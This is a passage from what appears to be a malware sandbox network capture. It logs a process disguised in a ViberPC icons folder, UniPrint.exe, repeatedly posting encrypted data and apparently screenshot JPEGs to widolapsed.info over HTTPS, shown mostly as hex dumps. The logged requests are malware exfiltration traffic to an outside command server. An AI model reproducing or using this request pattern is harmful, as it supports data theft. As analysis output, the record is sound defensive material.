41 45 14 50 01 4b 49 45 30 16 8a 4a 5a 00 5a 29 28
                                                                                                      Data Ascii: jjkQjkP*7G7@f>Ef>EZCyCjjkS$#MmC"!+9$n`@h++m^Bj1[D8KIEuAESJ(h(AEPKIE0JZZ)(
                                                                                                      2021-09-15 11:45:41 UTC1122OUTData Raw: 00 c2 2d ad ff 00 cf 97 fe 45 4f f1 a7 c9 26 b6 33 93 83 5c b2 66 f5 86 b1 04 8e be 45 e8 81 9f 82 59 f6 63 eb 5b 1a 9f 8b 34 dd 2e c4 c5 63 32 dd dc 81 85 0a 72 33 ea 4d 71 3f f0 8b 6b 7f f3 e5 ff 00 91 53 fc 68 ff 00 84 5b 5b ff 00 9f 2f fc 8a 9f e3 5c f5 70 5e d5 ae 6b d9 74 27 0d c9 87 bf 2b dc cb 9e 69 2e 27 92 79 9b 74 92 31 66 3e a4 d4 75 a8 de 1e d5 95 99 4d a6 0a f0 47 98 9f e3 54 ae ec ee 2c a5 11 5d 47 b1 ca ee 03 20 f1 f8 7d 2b a3 95 a5 b1 aa 92 7d 48 2a d6 9d 7f 3e 9b 78 b7 56 db 3c c5 ce 37 2e 47 3e d4 ed 3f 4a bd d4 bc cf b1 41 e6 f9 78 dd f3 a8 c6 73 8e a4 7a 1a bb ff 00 08 be b7 ff 00 3e 5f f9 15 3f c6 9a 8c b7 48 97 28 ec d9 31 f1 6e a6 7f e5 9d a7 fd f8 14 d3 e2 bd 48 f4 5b 60 7d 44 20 54 7f f0 8b eb 5f f3 e5 ff 00 91 53 fc 68 ff 00 84
                                                                                                      Data Ascii: -EO&3\fEYc[4.c2r3Mq?kSh[[/\p^kt'+i.'yt1f>uMGT,]G }+}H*>xV<7.G>?JAxsz>_?H(1nH[`}D T_Sh
                                                                                                      2021-09-15 11:45:41 UTC1123OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 39 31 38 39 35 37 31 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1291895716--
                                                                                                      2021-09-15 11:45:42 UTC1123INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:41 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=74da0ed575cf66f14583ff16cd489bc68a83938351dc5ccad80348da77c67836; expires=Thu, 15-Sep-2022 11:45:41 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:42 UTC1124INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.34977845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:42 UTC1124OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76682
                                                                                                      Content-Type: multipart/form-data; boundary=--------1315708494
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 31 35 37 30 38 34 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1315708494Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b6 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:42 UTC1140OUTData Raw: 33 f3 a7 d0 f6 fe 62 b9 dd 67 fe 3d 13 fe ba 0f e4 6b b2 a4 94 a9 39 2e a8 e3 a7 17 1a ca 2f a3 31 68 a2 8a f3 0f 54 28 a2 92 80 3d ea 58 03 fc c9 c3 7f 3a 80 64 1c 1e a2 ae 1a a6 c7 f7 af fe f1 af 97 a8 96 e7 af 16 48 a6 bc 63 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e cc a6 bc 67 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e 86 59 f1 48 e5 c5 ec 8a 14 b4 94 b5 ec 9c 41 46 28 a2 81 06 2b d3 fe 14 f1 a4 df 7f d7 71 ff 00 a0 d7 98 57 a7 7c 2a ff 00 90 4d f7 fd 77 1f fa 0d 67 57 e1 34 a7 f1 1d d5 25 64 d8 da c0 fa 4d b5 cd cc f7 59 68 16 49 1c dd ca 07 dd 04 9f bd 56 52 c2 d6 48 d5 e3 9a e9 95 86 41 17 92 e0 8f fb ea b1 71 8a 7b fe 1f f0 4d 14 a4 d6 df 8f fc 02 a6 a9 05 ad da 5d 5a 5e c1 24 91 ca c0 f1 13 37 f0 a8 c8 20 75 e2 bc 87 5f d2 ff 00 b2 35 47 b5 0e 5d
                                                                                                      Data Ascii: 3bg=k9./1hT(=X:dHc^R3^g^R3^YHAF(+qW|*MwgW4%dMYhIVRHAq{M]Z^$7 u_5G]
                                                                                                      2021-09-15 11:45:42 UTC1156OUTData Raw: 80 a0 0a 75 04 b6 14 94 b8 a3 14 c4 14 b4 94 b4 08 29 cb 4d a5 a0 07 d1 4d a7 0a 64 8b 45 25 2d 02 2c e9 df f1 fd 17 d6 9f 7a 7f d3 65 ff 00 7a 99 a7 7f c7 f4 5f 5a 5b b3 9b a9 3f de ac 3f e5 e9 6f f8 64 54 94 51 5a 98 8b 45 25 2d 00 14 51 45 02 16 8a 4a 5a 40 14 51 45 02 0a 5a 4a 5a 40 14 b4 94 a2 81 0a 29 69 29 69 08 5a b1 03 74 15 5a a6 b7 fb d5 12 d8 d2 93 b4 8d 7d 58 e3 c3 43 dd ab 89 7e b5 d9 eb 3c 78 69 3f de ae 2d cf 35 8e 17 e0 7e a7 a9 5f e3 5e 87 7a 38 f0 ed 97 d0 55 1c d5 d6 e3 c3 f6 23 fd 91 fc aa 8d 73 d1 eb ea 69 88 7e f2 f4 17 34 66 92 92 b6 39 ee 3b 34 a1 a9 a2 8a 2c 09 8f c9 a7 6e 3e b4 c1 4b 52 d1 69 b2 40 c6 9c 18 d4 42 9d 9a 96 8a 52 64 a1 cf ad 38 4c c3 a3 1a 84 1a 5a 97 14 5a 9b 2d 2d cc 83 f8 8d 4a b7 8e 3a e0 d5 20 69 d9 a8 74 e2
                                                                                                      Data Ascii: u)MMdE%-,zez_Z[??odTQZE%-QEJZ@QEZJZ@)i)iZtZ}XC~<xi?-5~_^z8U#si~4f9;4,n>KRi@BRd8LZZ--J: it
                                                                                                      2021-09-15 11:45:42 UTC1172OUTData Raw: ea 69 e3 49 8d 79 92 e6 31 f8 d6 6f 11 0e e5 ac 35 47 d0 c9 e2 8c 56 bf d9 34 d8 ff 00 d6 5d 03 f4 a3 cd d2 23 fe f3 d2 f6 fd 93 29 61 9f 56 91 93 8a 78 8d cf 01 49 fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac
                                                                                                      Data Ascii: iIy1o5GV4]#)aVxI+DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxT
                                                                                                      2021-09-15 11:45:42 UTC1188OUTData Raw: 0c 75 14 94 b4 c4 55 a5 a2 8a c4 d8 28 a2 8a 00 28 a2 8a 00 28 a2 92 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a6 02 d1 49 45 00 2d 25 2d 14 00 94 51 45 00 14 51 45 00 2d 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e
                                                                                                      Data Ascii: uU((((((IE-%-QEQE-PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@
                                                                                                      2021-09-15 11:45:42 UTC1199OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 31 35 37 30 38 34 39 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1315708494--
                                                                                                      2021-09-15 11:45:45 UTC1199INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:42 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=b43afc0eb707f8b68fa0a36d475eea243f65ba7380961676812b4c94a71a640c; expires=Thu, 15-Sep-2022 11:45:43 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:45 UTC1199INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.34978945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:47 UTC1199OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76660
                                                                                                      Content-Type: multipart/form-data; boundary=--------3047557173
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:47 UTC1200OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 30 34 37 35 35 37 31 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3047557173Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:47 UTC1200OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 a6 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:47 UTC1200OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:47 UTC1216OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:47 UTC1232OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:47 UTC1248OUTData Raw: 52 95 29 bd 91 4a 8a d4 5d 1a 73 f7 8a af d4 d3 c6 93 1a f3 25 cc 63 f1 ac de 22 1d cb 58 6a 8f a1 93 c5 18 ad 7f b2 69 b1 ff 00 ac ba 07 e9 47 9b a4 47 fd e7 a5 ed fb 26 52 c3 3e ad 23 27 14 f1 1b 9e 02 93 f8 56 89 d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8
                                                                                                      Data Ascii: R)J]s%c"XjiGG&R>#'V:_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KV
                                                                                                      2021-09-15 11:45:47 UTC1264OUTData Raw: 0d 36 a5 b2 92 17 34 52 50 68 b8 05 14 94 52 18 ea 29 29 69 88 ab 4b 45 15 89 b0 51 45 14 00 51 45 14 00 51 45 25 00 2d 14 51 40 05 14 51 40 05 14 51 4c 05 a2 92 8a 00 5a 4a 5a 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14
                                                                                                      Data Ascii: 64RPhR))iKEQEQEQE%-Q@Q@QLZJZ(((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h
                                                                                                      2021-09-15 11:45:47 UTC1274OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 30 34 37 35 35 37 31 37 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3047557173--
                                                                                                      2021-09-15 11:45:58 UTC1274INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:47 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=8c27c54f2fd76dc0ad9226e04f257e8207cb76898200853e1b0060be8d5aa986; expires=Thu, 15-Sep-2022 11:45:47 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:58 UTC1275INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.34980345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:00 UTC1275OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76627
                                                                                                      Content-Type: multipart/form-data; boundary=--------3142017803
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:00 UTC1275OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 34 32 30 31 37 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3142017803Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:00 UTC1275OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ef d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:00 UTC1275OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
